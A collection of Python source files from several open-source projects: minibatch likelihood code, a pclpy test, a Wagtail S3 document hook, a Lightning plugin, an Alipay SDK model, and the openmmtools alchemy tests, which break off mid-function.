_x = ndict.getCols(my_x, k*my_n_batch, (k+1)*my_n_batch).copy() #@UndefinedVariable
if z == None:
logpx, gw = my_model.dlogpxmc_dw(w, _x) #@UndefinedVariable
return logpx, None, gw, None
else:
return my_model.dlogpxz_dwz(w, _x, z) #@UndefinedVariable
tasks = []
for j in range(len(self.c)):
_z = z
if _z != None:
_z = ndict.getCols(z, j*self.n_batch, (j+1)*self.n_batch)
tasks.append(self.c.load_balanced_view().apply_async(dlogpxz_dwz, w, _z, i))
res = [task.get() for task in tasks]
v, gw, gz = res[0]
for k in range(1,len(self.c)):
vi, gwi, gzi = res[k]
v += vi
for j in gw: gw[j] += gwi[j]
for j in gz: gz[j] += gzi[j]
return v, gw, gz
def grad(self, w, z=None):
v, gw, gz = self.subgrad(0, w, z)
for i in range(1, self.n_minibatches):
vi, gwi, gzi = self.subgrad(i, w, z)
v += vi
for j in gw: gw[j] += gwi[j]
for j in gz: gz[j] += gzi[j]
return v, gw, gz
def val(self, w, z=None):
logpx, logpz = self.subval(0, w, z)
for i in range(1, self.n_minibatches):
_logpx, _logpz = self.subval(i, w, z)
logpx += _logpx
logpz += _logpz
return logpx, logpz
def grad(self, w, z=None):
logpx, logpz, gw, gz = self.subgrad(0, w, z)
for i in range(1, self.n_minibatches):
logpxi, logpzi, gwi, gzi = self.subgrad(i, w, z)
logpx += logpxi
logpz += logpzi
for j in gw: gw[j] += gwi[j]
for j in gz: gz[j] += gzi[j]
return logpx, logpz, gw, gz
# Helper function
def getColsZX(self, w, z, i):
_x = ndict.getCols(self.x, i*self.n_batch, (i+1)*self.n_batch)
if z != None:
_z = ndict.getCols(z, i*self.n_batch, (i+1)*self.n_batch)
return _z, _x
# Monte Carlo FuncLikelihood
class FuncLikelihoodMC():
def __init__(self, x, model, n_mc_samples):
self.x = x
self.model = model
self.n_mc_samples = n_mc_samples
self.n_minibatches = next(iter(x.values())).shape[1]
def subval(self, i, w):
_x = ndict.getCols(self.x, i, i+1)
return self.model.logpxmc(w, _x, self.n_mc_samples)
def subgrad(self, i, w):
_x = ndict.getCols(self.x, i, i+1)
logpx, gw = self.model.dlogpxmc_dw(w, _x, self.n_mc_samples)
return logpx, gw
def val(self, w):
logpx = [self.subval(i, w) for i in range(self.n_minibatches)]
return np.hstack(logpx)
def grad(self, w):
logpxi, gwi = tuple(zip(*[self.subgrad(i, w) for i in range(self.n_minibatches)]))
return np.hstack(logpxi), ndict.sum(gwi)
# FuncPosterior
class FuncPosteriorMC():
def __init__(self, likelihood, model):
self.ll = likelihood
self.model = model
self.n_minibatches = likelihood.n_minibatches
def subval(self, i, w):
prior = self.model.logpw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
logpx = self.ll.subval(i, w)
return logpx.sum(), logpx.sum() + prior_weight * prior
def subgrad(self, i, w):
logpx, gw = self.ll.subgrad(i, w)
v_prior, gw_prior = self.model.dlogpw_dw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
v = logpx.sum() + prior_weight * v_prior
for j in gw: gw[j] += prior_weight * gw_prior[j]
return logpx.sum(), v, gw
def val(self, w):
logpx = self.ll.val(w)
v = logpx.sum() + self.model.logpw(w)
return logpx.sum(), v
def grad(self, w):
logpx, gw = self.ll.grad(w)
v_prior, gw_prior = self.model.dlogpw_dw(w)
v = logpx.sum() + v_prior
for i in gw: gw[i] += gw_prior[i]
return logpx.sum(), v, gw
|
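One detail of `FuncPosterior` above that is easy to miss: `subval` and `subgrad` scale the log-prior by `prior_weight = 1 / n_minibatches`, so that summing the per-minibatch objectives recovers the full log-posterior. Reading the code, the decomposition with M minibatches is roughly:

```latex
\log p(w, z, x)
  = \log p(w) + \sum_{i=1}^{M}\bigl[\log p(x_i \mid w, z_i) + \log p(z_i)\bigr]
  = \sum_{i=1}^{M}\Bigl[\log p(x_i \mid w, z_i) + \log p(z_i) + \tfrac{1}{M}\log p(w)\Bigr]
```

which matches `subval`'s `logpx.sum() + logpz.sum() + prior_weight * prior`. This reading is inferred from the code above, not from separate documentation.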
processor/__init__.py | SeongSuKim95/Re-ID-baseline | 297 | 12749640 | from .processor import do_train, do_inference |
pclpy/tests/test_eigen.py | toinsson/pclpy | 293 | 12749661 | import pytest
import numpy as np
import pclpy
def test_eigen_vectorxf():
    a = np.array([1, 1, 1, 1], "f")
    vec = pclpy.pcl.vectors.VectorXf(a)
    assert np.allclose(np.array(vec), a)
|
tbx/core/wagtail_hooks.py | elviva404/wagtail-torchbox | 103 | 12749668 | from django.core.files.storage import get_storage_class
from django.shortcuts import redirect
from django.utils.cache import add_never_cache_headers
from storages.backends.s3boto3 import S3Boto3Storage
from wagtail.core import hooks
from wagtail.documents import get_document_model
from wagtail.documents.models import document_served
@hooks.register("before_serve_document", order=100)
def serve_document_from_s3(document, request):
    # Skip this hook if not using django-storages boto3 backend.
    if not issubclass(get_storage_class(), S3Boto3Storage):
        return

    # Send document_served signal.
    document_served.send(
        sender=get_document_model(), instance=document, request=request
    )

    # Get direct S3 link.
    file_url = document.file.url

    # Generate redirect response and add never_cache headers.
    response = redirect(file_url)
    del response["Cache-control"]
    add_never_cache_headers(response)
    return response


@hooks.register("construct_settings_menu")
def hide_main_menu_menu_item(request, menu_items):
    menu_items[:] = [item for item in menu_items if item.name != "main-menu"]
|
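The `before_serve_document` hook above only issues its redirect when the default storage class is (a subclass of) `S3Boto3Storage`. A hedged sketch of Django settings under which the hook would take effect is shown below; the bucket name and region are placeholders and not taken from the torchbox project.

```python
# Hedged sketch of settings.py entries under which the hook above activates.
# Bucket name and region are placeholders.
DEFAULT_FILE_STORAGE = "storages.backends.s3boto3.S3Boto3Storage"
AWS_STORAGE_BUCKET_NAME = "example-documents-bucket"
AWS_S3_REGION_NAME = "eu-west-2"
AWS_QUERYSTRING_AUTH = True  # signed URLs, so document.file.url is time-limited
```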
tests/plugins/custommsg_a.py | Bladez1753/lightning | 2,288 | 12749669 | #!/usr/bin/env python3
from pyln.client import Plugin
plugin = Plugin()
@plugin.hook('custommsg')
def on_custommsg(peer_id, payload, plugin, message=None, **kwargs):
    plugin.log("Got custommessage_a {msg} from peer {peer_id}".format(
        msg=payload,
        peer_id=peer_id
    ))
    return {'result': 'continue'}
plugin.run()
|
config.prod.py | R-fred/awesome-streamlit | 1,194 | 12749718 |
"""Configuration file for production Development"""
DEBUG = False
|
alipay/aop/api/domain/ComplextMockModel.py | snowxmas/alipay-sdk-python-all | 213 | 12749730 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.SimpleMockModel import SimpleMockModel
class ComplextMockModel(object):

    def __init__(self):
        self._biz_model = None
        self._biz_num = None
        self._biz_type = None

    @property
    def biz_model(self):
        return self._biz_model

    @biz_model.setter
    def biz_model(self, value):
        if isinstance(value, SimpleMockModel):
            self._biz_model = value
        else:
            self._biz_model = SimpleMockModel.from_alipay_dict(value)

    @property
    def biz_num(self):
        return self._biz_num

    @biz_num.setter
    def biz_num(self, value):
        self._biz_num = value

    @property
    def biz_type(self):
        return self._biz_type

    @biz_type.setter
    def biz_type(self, value):
        self._biz_type = value

    def to_alipay_dict(self):
        params = dict()
        if self.biz_model:
            if hasattr(self.biz_model, 'to_alipay_dict'):
                params['biz_model'] = self.biz_model.to_alipay_dict()
            else:
                params['biz_model'] = self.biz_model
        if self.biz_num:
            if hasattr(self.biz_num, 'to_alipay_dict'):
                params['biz_num'] = self.biz_num.to_alipay_dict()
            else:
                params['biz_num'] = self.biz_num
        if self.biz_type:
            if hasattr(self.biz_type, 'to_alipay_dict'):
                params['biz_type'] = self.biz_type.to_alipay_dict()
            else:
                params['biz_type'] = self.biz_type
        return params

    @staticmethod
    def from_alipay_dict(d):
        if not d:
            return None
        o = ComplextMockModel()
        if 'biz_model' in d:
            o.biz_model = d['biz_model']
        if 'biz_num' in d:
            o.biz_num = d['biz_num']
        if 'biz_type' in d:
            o.biz_type = d['biz_type']
        return o
|
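A short sketch of the dict round trip this generated model supports; it assumes `SimpleMockModel` follows the same no-argument constructor and `to_alipay_dict`/`from_alipay_dict` pattern as the class above, and the field values are illustrative.

```python
# Hedged sketch: serialising a ComplextMockModel to the dict form used by the SDK.
model = ComplextMockModel()
model.biz_num = 42
model.biz_type = "demo"
model.biz_model = SimpleMockModel()  # an instance passes the isinstance check directly

params = model.to_alipay_dict()
restored = ComplextMockModel.from_alipay_dict(params)
print(params, restored.biz_num)
```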
openmmtools/tests/test_alchemy.py | sroet/openmmtools | 135 | 12749731 |
#!/usr/bin/python
# =============================================================================
# MODULE DOCSTRING
# =============================================================================
"""
Tests for alchemical factory in `alchemy.py`.
"""
# =============================================================================
# GLOBAL IMPORTS
# =============================================================================
from __future__ import print_function
import os
import sys
import zlib
import pickle
import itertools
from functools import partial
import nose
import scipy
from nose.plugins.attrib import attr
from openmmtools import testsystems, forces
from openmmtools.constants import kB
from openmmtools.alchemy import *
logger = logging.getLogger(__name__)
# =============================================================================
# CONSTANTS
# =============================================================================
temperature = 300.0 * unit.kelvin # reference temperature
# MAX_DELTA = 0.01 * kB * temperature # maximum allowable deviation
MAX_DELTA = 1.0 * kB * temperature # maximum allowable deviation
GLOBAL_ENERGY_UNIT = unit.kilojoules_per_mole # controls printed units
GLOBAL_ALCHEMY_PLATFORM = None # This is used in every energy calculation.
# GLOBAL_ALCHEMY_PLATFORM = openmm.Platform.getPlatformByName('OpenCL') # DEBUG: Use OpenCL over CPU platform for testing since OpenCL is deterministic, while CPU is not
# =============================================================================
# TESTING UTILITIES
# =============================================================================
def create_context(system, integrator, platform=None):
"""Create a Context.
If platform is None, GLOBAL_ALCHEMY_PLATFORM is used.
"""
if platform is None:
platform = GLOBAL_ALCHEMY_PLATFORM
if platform is not None:
context = openmm.Context(system, integrator, platform)
else:
context = openmm.Context(system, integrator)
return context
def compute_energy(system, positions, platform=None, force_group=-1):
"""Compute energy of the system in the given positions.
Parameters
----------
platform : simtk.openmm.Platform or None, optional
If None, the global GLOBAL_ALCHEMY_PLATFORM will be used.
force_group : int flag or set of int, optional
Passed to the groups argument of Context.getState().
"""
timestep = 1.0 * unit.femtoseconds
integrator = openmm.VerletIntegrator(timestep)
context = create_context(system, integrator, platform)
context.setPositions(positions)
state = context.getState(getEnergy=True, groups=force_group)
potential = state.getPotentialEnergy()
del context, integrator, state
return potential
def minimize(system, positions, platform=None, tolerance=1.0*unit.kilocalories_per_mole/unit.angstroms, maxIterations=50):
"""Minimize the energy of the given system.
Parameters
----------
platform : simtk.openmm.Platform or None, optional
If None, the global GLOBAL_ALCHEMY_PLATFORM will be used.
tolerance : simtk.unit.Quantity with units compatible with energy/distance, optional, default = 1*kilocalories_per_mole/angstroms
Minimization tolerance
maxIterations : int, optional, default=50
Maximum number of iterations for minimization
Returns
-------
minimized_positions : simtk.openmm.Quantity with shape [nparticle,3] with units compatible with distance
The energy-minimized positions.
"""
timestep = 1.0 * unit.femtoseconds
integrator = openmm.VerletIntegrator(timestep)
context = create_context(system, integrator, platform)
context.setPositions(positions)
openmm.LocalEnergyMinimizer.minimize(context, tolerance, maxIterations)
minimized_positions = context.getState(getPositions=True).getPositions(asNumpy=True)
del context, integrator
return minimized_positions
def compute_force_energy(system, positions, force_name):
"""Compute the energy of the force with the given name."""
system = copy.deepcopy(system) # Copy to avoid modifications
force_name_index = 1
found_force = False
# Separate force group of force_name from all others.
for force in system.getForces():
if force.__class__.__name__ == force_name:
force.setForceGroup(force_name_index)
found_force = True
else:
force.setForceGroup(0)
if not found_force:
return None
force_energy = compute_energy(system, positions, force_group=2**force_name_index)
del system
return force_energy
def assert_almost_equal(energy1, energy2, err_msg):
delta = energy1 - energy2
err_msg += ' interactions do not match! Reference {}, alchemical {},' \
' difference {}'.format(energy1, energy2, delta)
assert abs(delta) < MAX_DELTA, err_msg
def turn_off_nonbonded(system, sterics=False, electrostatics=False,
exceptions=False, only_atoms=frozenset()):
"""Turn off sterics and/or electrostatics interactions.
This affects only NonbondedForce and non-alchemical CustomNonbondedForces.
If `exceptions` is True, only the exceptions are turned off.
Support also system that have gone through replace_reaction_field.
The `system` must have only nonbonded forces.
If `only_atoms` is specified, only the those atoms will be turned off.
"""
if len(only_atoms) == 0: # if empty, turn off all particles
only_atoms = set(range(system.getNumParticles()))
epsilon_coeff = 0.0 if sterics else 1.0
charge_coeff = 0.0 if electrostatics else 1.0
if exceptions: # Turn off exceptions
force_idx, nonbonded_force = forces.find_forces(system, openmm.NonbondedForce, only_one=True)
# Exceptions.
for exception_index in range(nonbonded_force.getNumExceptions()):
iatom, jatom, charge, sigma, epsilon = nonbonded_force.getExceptionParameters(exception_index)
if iatom in only_atoms or jatom in only_atoms:
nonbonded_force.setExceptionParameters(exception_index, iatom, jatom,
charge_coeff*charge, sigma, epsilon_coeff*epsilon)
# Offset exceptions.
for offset_index in range(nonbonded_force.getNumExceptionParameterOffsets()):
(parameter, exception_index, chargeprod_scale,
sigma_scale, epsilon_scale) = nonbonded_force.getExceptionParameterOffset(offset_index)
iatom, jatom, _, _, _ = nonbonded_force.getExceptionParameters(exception_index)
if iatom in only_atoms or jatom in only_atoms:
nonbonded_force.setExceptionParameterOffset(offset_index, parameter, exception_index,
charge_coeff*chargeprod_scale, sigma_scale,
epsilon_coeff*epsilon_scale)
else:
# Turn off particle interactions
for force in system.getForces():
# Handle only a Nonbonded and a CustomNonbonded (for RF).
if not (isinstance(force, openmm.CustomNonbondedForce) and 'lambda' not in force.getEnergyFunction() or
isinstance(force, openmm.NonbondedForce)):
continue
# Particle interactions.
for particle_index in range(force.getNumParticles()):
if particle_index in only_atoms:
# Convert tuple parameters to list to allow changes.
parameters = list(force.getParticleParameters(particle_index))
parameters[0] *= charge_coeff # charge
try: # CustomNonbondedForce
force.setParticleParameters(particle_index, parameters)
except TypeError: # NonbondedForce
parameters[2] *= epsilon_coeff # epsilon
force.setParticleParameters(particle_index, *parameters)
# Offset particle interactions.
if isinstance(force, openmm.NonbondedForce):
for offset_index in range(force.getNumParticleParameterOffsets()):
(parameter, particle_index, charge_scale,
sigma_scale, epsilon_scale) = force.getParticleParameterOffset(offset_index)
if particle_index in only_atoms:
force.setParticleParameterOffset(offset_index, parameter, particle_index,
charge_coeff*charge_scale, sigma_scale,
epsilon_coeff*epsilon_scale)
def dissect_nonbonded_energy(reference_system, positions, alchemical_atoms, other_alchemical_atoms):
"""Dissect the nonbonded energy contributions of the reference system
by atom group and sterics/electrostatics.
This works also for systems objects whose CutoffPeriodic force
has been replaced by a CustomNonbondedForce to set c_rf = 0.
Parameters
----------
reference_system : simtk.openmm.System
The reference system with the NonbondedForce to dissect.
positions : simtk.openmm.unit.Quantity of dimension [nparticles,3] with units compatible with Angstroms
The positions to test.
alchemical_atoms : set of int
The indices of the alchemical atoms.
other_alchemical_atoms : set of int
The indices of the alchemical atoms in other alchemical regions
Returns
-------
tuple of simtk.openmm.unit.Quantity with units compatible with kJ/mol
All contributions to the potential energy of NonbondedForce in the order:
nn_particle_sterics: particle sterics interactions between nonalchemical atoms
aa_particle_sterics: particle sterics interactions between alchemical atoms
na_particle_sterics: particle sterics interactions between nonalchemical-alchemical atoms
nn_particle_electro: (direct space) particle electrostatics interactions between nonalchemical atoms
aa_particle_electro: (direct space) particle electrostatics interactions between alchemical atoms
na_particle_electro: (direct space) particle electrostatics interactions between nonalchemical-alchemical atoms
nn_exception_sterics: particle sterics 1,4 exceptions between nonalchemical atoms
aa_exception_sterics: particle sterics 1,4 exceptions between alchemical atoms
na_exception_sterics: particle sterics 1,4 exceptions between nonalchemical-alchemical atoms
nn_exception_electro: particle electrostatics 1,4 exceptions between nonalchemical atoms
aa_exception_electro: particle electrostatics 1,4 exceptions between alchemical atoms
na_exception_electro: particle electrostatics 1,4 exceptions between nonalchemical-alchemical atoms
nn_reciprocal_energy: electrostatics of reciprocal space between nonalchemical atoms
aa_reciprocal_energy: electrostatics of reciprocal space between alchemical atoms
na_reciprocal_energy: electrostatics of reciprocal space between nonalchemical-alchemical atoms
"""
all_alchemical_atoms = set(alchemical_atoms).union(other_alchemical_atoms)
nonalchemical_atoms = set(range(reference_system.getNumParticles())).difference(all_alchemical_atoms)
# Remove all forces but NonbondedForce and eventually the
# CustomNonbondedForce used to model reaction field.
reference_system = copy.deepcopy(reference_system) # don't modify original system
forces_to_remove = list()
for force_index, force in enumerate(reference_system.getForces()):
force.setForceGroup(0)
if isinstance(force, openmm.NonbondedForce):
force.setReciprocalSpaceForceGroup(30) # separate PME reciprocal from direct space
# We keep only CustomNonbondedForces that are not alchemically modified.
elif not (isinstance(force, openmm.CustomNonbondedForce) and
'lambda' not in force.getEnergyFunction()):
forces_to_remove.append(force_index)
for force_index in reversed(forces_to_remove):
reference_system.removeForce(force_index)
assert len(reference_system.getForces()) <= 2
# Compute particle interactions between different groups of atoms
# ----------------------------------------------------------------
# Turn off other alchemical regions
if len(other_alchemical_atoms) > 0:
turn_off_nonbonded(reference_system, sterics=True, electrostatics=True, only_atoms=other_alchemical_atoms)
turn_off_nonbonded(reference_system, sterics=True, electrostatics=True, exceptions=True, only_atoms=other_alchemical_atoms)
system = copy.deepcopy(reference_system)
# Compute total energy from nonbonded interactions
tot_energy = compute_energy(system, positions)
tot_reciprocal_energy = compute_energy(system, positions, force_group={30})
# Compute contributions from particle sterics
turn_off_nonbonded(system, sterics=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_particle_sterics = compute_energy(system, positions)
system = copy.deepcopy(reference_system) # Restore alchemical sterics
turn_off_nonbonded(system, sterics=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_particle_sterics = compute_energy(system, positions)
turn_off_nonbonded(system, sterics=True)
tot_energy_no_particle_sterics = compute_energy(system, positions)
tot_particle_sterics = tot_energy - tot_energy_no_particle_sterics
nn_particle_sterics = tot_energy_no_alchem_particle_sterics - tot_energy_no_particle_sterics
aa_particle_sterics = tot_energy_no_nonalchem_particle_sterics - tot_energy_no_particle_sterics
na_particle_sterics = tot_particle_sterics - nn_particle_sterics - aa_particle_sterics
# Compute contributions from particle electrostatics
system = copy.deepcopy(reference_system) # Restore sterics
turn_off_nonbonded(system, electrostatics=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_particle_electro = compute_energy(system, positions)
nn_reciprocal_energy = compute_energy(system, positions, force_group={30})
system = copy.deepcopy(reference_system) # Restore alchemical electrostatics
turn_off_nonbonded(system, electrostatics=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_particle_electro = compute_energy(system, positions)
aa_reciprocal_energy = compute_energy(system, positions, force_group={30})
turn_off_nonbonded(system, electrostatics=True)
tot_energy_no_particle_electro = compute_energy(system, positions)
na_reciprocal_energy = tot_reciprocal_energy - nn_reciprocal_energy - aa_reciprocal_energy
tot_particle_electro = tot_energy - tot_energy_no_particle_electro
nn_particle_electro = tot_energy_no_alchem_particle_electro - tot_energy_no_particle_electro
aa_particle_electro = tot_energy_no_nonalchem_particle_electro - tot_energy_no_particle_electro
na_particle_electro = tot_particle_electro - nn_particle_electro - aa_particle_electro
nn_particle_electro -= nn_reciprocal_energy
aa_particle_electro -= aa_reciprocal_energy
na_particle_electro -= na_reciprocal_energy
# Compute exceptions between different groups of atoms
# -----------------------------------------------------
# Compute contributions from exceptions sterics
system = copy.deepcopy(reference_system) # Restore particle interactions
turn_off_nonbonded(system, sterics=True, exceptions=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_exception_sterics = compute_energy(system, positions)
system = copy.deepcopy(reference_system) # Restore alchemical sterics
turn_off_nonbonded(system, sterics=True, exceptions=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_exception_sterics = compute_energy(system, positions)
turn_off_nonbonded(system, sterics=True, exceptions=True)
tot_energy_no_exception_sterics = compute_energy(system, positions)
tot_exception_sterics = tot_energy - tot_energy_no_exception_sterics
nn_exception_sterics = tot_energy_no_alchem_exception_sterics - tot_energy_no_exception_sterics
aa_exception_sterics = tot_energy_no_nonalchem_exception_sterics - tot_energy_no_exception_sterics
na_exception_sterics = tot_exception_sterics - nn_exception_sterics - aa_exception_sterics
# Compute contributions from exceptions electrostatics
system = copy.deepcopy(reference_system) # Restore exceptions sterics
turn_off_nonbonded(system, electrostatics=True, exceptions=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_exception_electro = compute_energy(system, positions)
system = copy.deepcopy(reference_system) # Restore alchemical electrostatics
turn_off_nonbonded(system, electrostatics=True, exceptions=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_exception_electro = compute_energy(system, positions)
turn_off_nonbonded(system, electrostatics=True, exceptions=True)
tot_energy_no_exception_electro = compute_energy(system, positions)
tot_exception_electro = tot_energy - tot_energy_no_exception_electro
nn_exception_electro = tot_energy_no_alchem_exception_electro - tot_energy_no_exception_electro
aa_exception_electro = tot_energy_no_nonalchem_exception_electro - tot_energy_no_exception_electro
na_exception_electro = tot_exception_electro - nn_exception_electro - aa_exception_electro
assert tot_particle_sterics == nn_particle_sterics + aa_particle_sterics + na_particle_sterics
assert_almost_equal(tot_particle_electro, nn_particle_electro + aa_particle_electro +
na_particle_electro + nn_reciprocal_energy + aa_reciprocal_energy + na_reciprocal_energy,
'Inconsistency during dissection of nonbonded contributions:')
assert tot_exception_sterics == nn_exception_sterics + aa_exception_sterics + na_exception_sterics
assert tot_exception_electro == nn_exception_electro + aa_exception_electro + na_exception_electro
assert_almost_equal(tot_energy, tot_particle_sterics + tot_particle_electro +
tot_exception_sterics + tot_exception_electro,
'Inconsistency during dissection of nonbonded contributions:')
return nn_particle_sterics, aa_particle_sterics, na_particle_sterics,\
nn_particle_electro, aa_particle_electro, na_particle_electro,\
nn_exception_sterics, aa_exception_sterics, na_exception_sterics,\
nn_exception_electro, aa_exception_electro, na_exception_electro,\
nn_reciprocal_energy, aa_reciprocal_energy, na_reciprocal_energy
def compute_direct_space_correction(nonbonded_force, alchemical_atoms, positions):
"""
Compute the correction added by OpenMM to the direct space to account for
exception in reciprocal space energy.
Parameters
----------
nonbonded_force : simtk.openmm.NonbondedForce
The nonbonded force to compute the direct space correction.
alchemical_atoms : set
Set of alchemical particles in the force.
positions : numpy.array
Position of the particles.
Returns
-------
aa_correction : simtk.openmm.unit.Quantity with units compatible with kJ/mol
The correction to the direct spaced caused by exceptions between alchemical atoms.
na_correction : simtk.openmm.unit.Quantity with units compatible with kJ/mol
The correction to the direct spaced caused by exceptions between nonalchemical-alchemical atoms.
"""
energy_unit = unit.kilojoule_per_mole
aa_correction = 0.0
na_correction = 0.0
# Convert quantity positions into floats.
if isinstance(positions, unit.Quantity):
positions = positions.value_in_unit_system(unit.md_unit_system)
# If there is no reciprocal space, the correction is 0.0
if nonbonded_force.getNonbondedMethod() not in [openmm.NonbondedForce.Ewald, openmm.NonbondedForce.PME]:
return aa_correction * energy_unit, na_correction * energy_unit
# Get alpha ewald parameter
alpha_ewald, _, _, _ = nonbonded_force.getPMEParameters()
if alpha_ewald / alpha_ewald.unit == 0.0:
cutoff_distance = nonbonded_force.getCutoffDistance()
tolerance = nonbonded_force.getEwaldErrorTolerance()
alpha_ewald = (1.0 / cutoff_distance) * np.sqrt(-np.log(2.0*tolerance))
alpha_ewald = alpha_ewald.value_in_unit_system(unit.md_unit_system)
assert alpha_ewald != 0.0
for exception_id in range(nonbonded_force.getNumExceptions()):
# Get particles parameters in md unit system
iatom, jatom, _, _, _ = nonbonded_force.getExceptionParameters(exception_id)
icharge, _, _ = nonbonded_force.getParticleParameters(iatom)
jcharge, _, _ = nonbonded_force.getParticleParameters(jatom)
icharge = icharge.value_in_unit_system(unit.md_unit_system)
jcharge = jcharge.value_in_unit_system(unit.md_unit_system)
# Compute the correction and take care of numerical instabilities
r = np.linalg.norm(positions[iatom] - positions[jatom]) # distance between atoms
alpha_r = alpha_ewald * r
if alpha_r > 1e-6:
correction = ONE_4PI_EPS0 * icharge * jcharge * scipy.special.erf(alpha_r) / r
else: # for small alpha_r we linearize erf()
correction = ONE_4PI_EPS0 * alpha_ewald * icharge * jcharge * 2.0 / np.sqrt(np.pi)
# Assign correction to correct group
if iatom in alchemical_atoms and jatom in alchemical_atoms:
aa_correction += correction
elif iatom in alchemical_atoms or jatom in alchemical_atoms:
na_correction += correction
return aa_correction * energy_unit, na_correction * energy_unit
def is_alchemical_pme_treatment_exact(alchemical_system):
"""Return True if the given alchemical system models PME exactly."""
# If exact PME is here, the NonbondedForce defines a
# lambda_electrostatics variable.
_, nonbonded_force = forces.find_forces(alchemical_system, openmm.NonbondedForce,
only_one=True)
for parameter_idx in range(nonbonded_force.getNumGlobalParameters()):
parameter_name = nonbonded_force.getGlobalParameterName(parameter_idx)
# With multiple alchemical regions, lambda_electrostatics might have a suffix.
if parameter_name.startswith('lambda_electrostatics'):
return True
return False
# =============================================================================
# SUBROUTINES FOR TESTING
# =============================================================================
def compare_system_energies(reference_system, alchemical_system, alchemical_regions, positions):
"""Check that the energies of reference and alchemical systems are close.
This takes care of ignoring the reciprocal space when the nonbonded
method is an Ewald method.
"""
if not isinstance(alchemical_regions, list):
alchemical_regions = [alchemical_regions]
# Default we compare the energy of all groups.
force_group = -1
# Check nonbonded method. Comparing with PME is more complicated
# because the alchemical system with direct-space treatment of PME
# does not take into account the reciprocal space.
force_idx, nonbonded_force = forces.find_forces(reference_system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
is_direct_space_pme = (nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald] and
not is_alchemical_pme_treatment_exact(alchemical_system))
if is_direct_space_pme:
# Separate the reciprocal space force in a different group.
reference_system = copy.deepcopy(reference_system)
alchemical_system = copy.deepcopy(alchemical_system)
for system in [reference_system, alchemical_system]:
for force in system.getForces():
force.setForceGroup(0)
if isinstance(force, openmm.NonbondedForce):
force.setReciprocalSpaceForceGroup(31)
# We compare only the direct space energy
force_group = {0}
# Compute the reciprocal space correction added to the direct space
# energy due to the exceptions of the alchemical atoms.
aa_correction = 0.0 * unit.kilojoule_per_mole
na_correction = 0.0 * unit.kilojoule_per_mole
for region in alchemical_regions:
alchemical_atoms = region.alchemical_atoms
aa, na = compute_direct_space_correction(nonbonded_force, alchemical_atoms, positions)
aa_correction += aa
na_correction += na
# Compute potential of the direct space.
potentials = [compute_energy(system, positions, force_group=force_group)
for system in [reference_system, alchemical_system]]
# Add the direct space correction.
if is_direct_space_pme:
potentials.append(aa_correction + na_correction)
else:
potentials.append(0.0 * GLOBAL_ENERGY_UNIT)
# Check that error is small.
delta = potentials[1] - potentials[2] - potentials[0]
if abs(delta) > MAX_DELTA:
print("========")
for description, potential in zip(['reference', 'alchemical', 'PME correction'], potentials):
print("{}: {} ".format(description, potential))
print("delta : {}".format(delta))
err_msg = "Maximum allowable deviation exceeded (was {:.8f} kcal/mol; allowed {:.8f} kcal/mol)."
raise Exception(err_msg.format(delta / unit.kilocalories_per_mole, MAX_DELTA / unit.kilocalories_per_mole))
def check_multi_interacting_energy_components(reference_system, alchemical_system, alchemical_regions, positions):
"""wrapper around check_interacting_energy_components for multiple regions
Parameters
----------
reference_system : simtk.openmm.System
The reference system.
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
    Note
    ----
    Interactions between alchemical regions are not tested here.
    Alchemical regions are assumed to be non-interacting.
"""
all_alchemical_atoms = set()
for region in alchemical_regions:
for atom in region.alchemical_atoms:
all_alchemical_atoms.add(atom)
for region in alchemical_regions:
check_interacting_energy_components(
reference_system, alchemical_system, region, positions,
all_alchemical_atoms, multi_regions=True)
def check_interacting_energy_components(reference_system, alchemical_system, alchemical_regions, positions,
all_alchemical_atoms=None, multi_regions=False):
"""Compare full and alchemically-modified system energies by energy component.
Parameters
----------
reference_system : simtk.openmm.System
The reference system.
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
multi_regions : boolean
        Indicates if multiple regions are being tested.
"""
energy_unit = unit.kilojoule_per_mole
reference_system = copy.deepcopy(reference_system)
alchemical_system = copy.deepcopy(alchemical_system)
is_exact_pme = is_alchemical_pme_treatment_exact(alchemical_system)
# Find nonbonded method
_, nonbonded_force = forces.find_forces(reference_system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
# Get energy components of reference system's nonbonded force
if multi_regions:
other_alchemical_atoms = all_alchemical_atoms.difference(alchemical_regions.alchemical_atoms)
print("Dissecting reference system's nonbonded force for region {}".format(alchemical_regions.name))
else:
other_alchemical_atoms = set()
print("Dissecting reference system's nonbonded force")
energy_components = dissect_nonbonded_energy(reference_system, positions,
alchemical_regions.alchemical_atoms, other_alchemical_atoms)
nn_particle_sterics, aa_particle_sterics, na_particle_sterics,\
nn_particle_electro, aa_particle_electro, na_particle_electro,\
nn_exception_sterics, aa_exception_sterics, na_exception_sterics,\
nn_exception_electro, aa_exception_electro, na_exception_electro,\
nn_reciprocal_energy, aa_reciprocal_energy, na_reciprocal_energy = energy_components
# Dissect unmodified nonbonded force in alchemical system
if multi_regions:
print("Dissecting alchemical system's unmodified nonbonded force for region {}".format(alchemical_regions.name))
else:
print("Dissecting alchemical system's unmodified nonbonded force")
energy_components = dissect_nonbonded_energy(alchemical_system, positions,
alchemical_regions.alchemical_atoms, other_alchemical_atoms)
unmod_nn_particle_sterics, unmod_aa_particle_sterics, unmod_na_particle_sterics,\
unmod_nn_particle_electro, unmod_aa_particle_electro, unmod_na_particle_electro,\
